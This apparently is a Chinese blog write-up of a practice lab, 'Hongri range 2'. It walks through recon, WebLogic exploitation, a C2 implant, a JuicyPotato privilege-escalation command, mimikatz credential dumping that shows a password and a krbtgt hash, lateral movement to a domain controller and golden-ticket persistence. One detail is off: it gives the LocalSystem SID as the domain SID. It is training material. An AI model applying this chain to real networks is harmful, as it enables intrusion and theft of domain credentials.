红日靶场 2

内网渗透 红日靶场系列
渗透
发布日期:   2026-03-20

红日靶场 2

靶场搭建

需要先配置一个虚拟网卡 VMnet2​,网段是 10.10.10.0/24

image

然后配置靶机的网卡

PC:

image

image

DC:

image

image

WEB:

image

image

这里要修改 NAT 的网段地址,我的 kali 上是 154

在 windows 中搜索 网络和共享中心,选择更改适配器设置

image

右键属性

image

选择 Internet 协议版本 4

image

image

然后需要开启 WEB 服务,到 WEB 服务器,右键以管理员登录这三个文件

image

渗透过程

信息收集

image

目录遍历

这里目录没有扫描到东西,这个 301 也是空的

image

端口扫描

感觉端口扫描可能东西多一点

image

Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-12 16:34 CST
Nmap scan report for 192.168.154.80
Host is up (0.00089s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
| ms-sql-info:
|   192.168.154.80:1433:
|     Version:
|       name: Microsoft SQL Server 2008 R2 SP2
|       number: 10.50.4000.00
|       Product: Microsoft SQL Server 2008 R2
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2026-03-12T08:35:37+00:00; 0s from scanner time.
| ms-sql-ntlm-info:
|   192.168.154.80:1433:
|     Target_Name: DE1AY
|     NetBIOS_Domain_Name: DE1AY
|     NetBIOS_Computer_Name: WEB
|     DNS_Domain_Name: de1ay.com
|     DNS_Computer_Name: WEB.de1ay.com
|     DNS_Tree_Name: de1ay.com
|_    Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-03-12T08:02:49
|_Not valid after:  2056-03-12T08:02:49
7001/tcp  open  afs3-callback
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: WEB
|   NetBIOS computer name: WEB\x00
|   Domain name: de1ay.com
|   Forest name: de1ay.com
|   FQDN: WEB.de1ay.com
|_  System time: 2026-03-12T16:34:27+08:00
| smb2-time:
|   date: 2026-03-12T08:34:27
|_  start_date: 2026-03-12T08:03:16
|_nbstat: NetBIOS name: WEB, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:52:fa:49 (VMware)
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
|_clock-skew: mean: -1h36m00s, deviation: 3h34m39s, median: -1s
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap done: 1 IP address (1 host up) scanned in 75.90 seconds

渗透

永恒之蓝(失败)

这里开了 445 和 139 端口,看看有没有永恒之蓝

image

这里检测是有的,但是好像是打不通的

image

image

image

这里后面发现应该是 360 干的(

MSSQL(失败)

然后看看这里还有一个 mssql 能不能打,没有用户名和密码,应该也是不行

WebLogic

这里还有一个 7001 端口,是 WebLogic 的端口,版本是 Oracle WebLogic Server 10.3.6.0,有东西就可以扫描了

image

image

image

这个版本应该是存在漏洞的,利用工具试一下,存在漏洞

image

看看能不能注入内存马,这里发现用这个漏洞注入不进去内存马,换了一个漏洞

image

这个漏洞注入的冰蝎内存马是可以连接的,但是蚁剑不行不知道为什么

image

image

后来突然想起来,只能命令执行的话可以直接上 vshell 了,成功上线了

image

内网渗透

能上传文件了,可以上 CS 了,这个还是好用一点,不过文件上传上去好像不成功,应该是被 360 给防护了

查看当前所有进程,这里看到几个进程,应该是 360 的杀软

tasklist /svc

C:\Windows\Temp>tasklist /svc

映像名称                       PID 服务
========================= ======== ============================================
System Idle Process              0 暂缺
System                           4 暂缺
smss.exe                       256 暂缺
csrss.exe                      344 暂缺
wininit.exe                    396 暂缺
csrss.exe                      408 暂缺
winlogon.exe                   444 暂缺
services.exe                   500 暂缺
lsass.exe                      516 Netlogon, SamSs
lsm.exe                        524 暂缺
svchost.exe                    612 DcomLaunch, PlugPlay, Power
vmacthlp.exe                   672 VMware Physical Disk Helper Service
svchost.exe                    708 RpcEptMapper, RpcSs
svchost.exe                    788 Dhcp, eventlog, lmhosts
svchost.exe                    856 AeLookupSvc, BITS, CertPropSvc, gpsvc,
                                   IKEEXT, iphlpsvc, LanmanServer, ProfSvc,
                                   Schedule, SENS, SessionEnv,
                                   ShellHWDetection, Winmgmt, wuauserv
svchost.exe                    912 EventSystem, netprofm, nsi, sppuinotify,
                                   W32Time, WinHttpAutoProxySvc
svchost.exe                    956 Netman, TrkWks, UmRdpService, UxSms
ZhuDongFangYu.exe             1012 ZhuDongFangYu
svchost.exe                    356 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc
svchost.exe                    732 BFE, DPS, MpsSvc
spoolsv.exe                   1232 Spooler
svchost.exe                   1264 AppHostSvc
sqlservr.exe                  1392 MSSQL$SQLEXPRESS
SMSvcHost.exe                 1412 NetPipeActivator, NetTcpActivator,
                                   NetTcpPortSharing
ReportingServicesService.     1560 ReportServer$SQLEXPRESS
sqlwriter.exe                 1880 SQLWriter
VGAuthService.exe             1904 VGAuthService
vmtoolsd.exe                  1948 VMTools
svchost.exe                   1972 W3SVC, WAS
fdlauncher.exe                2128 MSSQLFDLauncher$SQLEXPRESS
svchost.exe                   2168 TermService
WmiPrvSE.exe                  2204 暂缺
svchost.exe                   2252 PolicyAgent
fdhost.exe                    2400 暂缺
conhost.exe                   2408 暂缺
dllhost.exe                   2472 COMSysApp
msdtc.exe                     2560 MSDTC
sppsvc.exe                     844 sppsvc
taskhost.exe                  2896 暂缺
dwm.exe                       1240 暂缺
explorer.exe                  2364 暂缺
vmtoolsd.exe                   908 暂缺
360Tray.exe                   2868 暂缺
SoftMgrLite.exe               3624 暂缺
cmd.exe                       1848 暂缺
conhost.exe                   4008 暂缺
java.exe                      3776 暂缺
cmd.exe                       3924 暂缺
conhost.exe                    604 暂缺
ebda8925tcp.exe               4144 暂缺
winpty-agent.exe              4520 暂缺
conhost.exe                   4480 暂缺
cmd.exe                       4116 暂缺
1.exe                         2740 暂缺
1.exe                         4300 暂缺
1.exe                         5096 暂缺
1.exe                         3588 暂缺
360Safe.exe                   4024 暂缺
360leakfixer.exe               940 暂缺
tasklist.exe                  3876 暂缺

后来研究了半天,不知道为什么上线不了 CS,上靶机看了一眼发现是这个程序不知道为什么运行不了,会自动停止,好像也不是 360 的问题

image

不知道为什么,先用 vshell 打了,好像依旧可以用土豆家族打

C:\Users\Administrator\Desktop>whoami /priv

特权信息
----------------------

特权名                          描述                       状态
=============================== ========================== ======
SeIncreaseQuotaPrivilege        为进程调整内存配额         已禁用
SeSecurityPrivilege             管理审核和安全日志         已禁用
SeTakeOwnershipPrivilege        取得文件或其他对象的所有权 已禁用
SeLoadDriverPrivilege           加载和卸载设备驱动程序     已禁用
SeSystemProfilePrivilege        配置文件系统性能           已禁用
SeSystemtimePrivilege           更改系统时间               已禁用
SeProfileSingleProcessPrivilege 配置文件单个进程           已禁用
SeIncreaseBasePriorityPrivilege 提高计划优先级             已禁用
SeCreatePagefilePrivilege       创建一个页面文件           已禁用
SeBackupPrivilege               备份文件和目录             已禁用
SeRestorePrivilege              还原文件和目录             已禁用
SeShutdownPrivilege             关闭系统                   已禁用
SeDebugPrivilege                调试程序                   已启用
SeSystemEnvironmentPrivilege    修改固件环境值             已禁用
SeChangeNotifyPrivilege         绕过遍历检查               已启用
SeRemoteShutdownPrivilege       从远程系统强制关机         已禁用
SeUndockPrivilege               从扩展坞上取下计算机       已禁用
SeManageVolumePrivilege         执行卷维护任务             已禁用
SeImpersonatePrivilege          身份验证后模拟客户端       已启用
SeCreateGlobalPrivilege         创建全局对象               已启用
SeIncreaseWorkingSetPrivilege   增加进程工作集             已禁用
SeTimeZonePrivilege             更改时区                   已禁用
SeCreateSymbolicLinkPrivilege   创建符号链接               已禁用

成功提权

C:\Windows\Temp\JuicyPotato.exe -t t -p "C:\Windows\Temp\tcp_windows_amd64.exe" -l 1337

image

傻了,纠结半天,我可以直接 rdp 上去把 360 杀了

结果杀了依旧停止工作,我真没招了

image

找到问题了,应该是这个 ip 限制的问题,原本是使用的 wsl 打开的 cs,后面修改成用我的 ubuntu 起 cs,ip 修改为 192.168.154.130 之后就可以了

image

然后直接权限提升

image

内网横向

信息收集

这里另一个 IP 应该就是内网网段的 IP 10.10.10.0/24

image

执行插件 mimikatz,成功获取到了用户密码 admin@123

image

这里获取域信息会报错

image

获取域信息,这里确定在域中

net config workstation

image

可以使用这个命令查看域内信息,这个是不会报错的,成功获取了域内信息

net computers

image

进行端口扫描,扫到有 445 端口

image

image

另一台机子也是一样开启了 445

image

横向移动

这里确认了域控机器开启了 445 端口,那就尝试横向连接上去

image

image

成功上线

image

image

另一台

image

image

权限维持

这里需要创建一个黄金票据,如果被下线了,只要又掌握了另一台外网服务器,就可以使用黄金票据恢复域管理员的身份

获取黄金票据需要 4 个信息

  1. 域的 SID 安全标识符
  2. 域的名称
  3. krbtgt 账户的 NTLM Hash
  4. 需要伪造的用户

获取到 SID

shell whoami /all
S-1-5-18

image

获取域名

shell ipconfig /all
de1ay.com

image

获取到 krbtgt​ 的哈希,NTLM 是最后一部分的 hash,这个是格式是
用户名:RID:LM Hash:NTLM Hash:::

82dfc71b72a11ef37d663047bc2088fb

image

需要伪造的用户

net user

image

然后要切换目录到 C 盘中

image

image

输入信息

image

生成成功

image

另一种确认方法

run klist

image

然后需要创建黄金票据,刚才只是生成了,现在需要创建一个文件来保存

mimikatz kerberos::list /export

image

image

然后需要将这两个文件下载下来

image

这里下载的两个文件在虚拟机中

image

文章作者: Marin
文章链接: https://wwwmarin.xyz/2026/03/20/hong-ri-ba-chang-2/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Marin !
内网渗透 红日靶场系列
  目录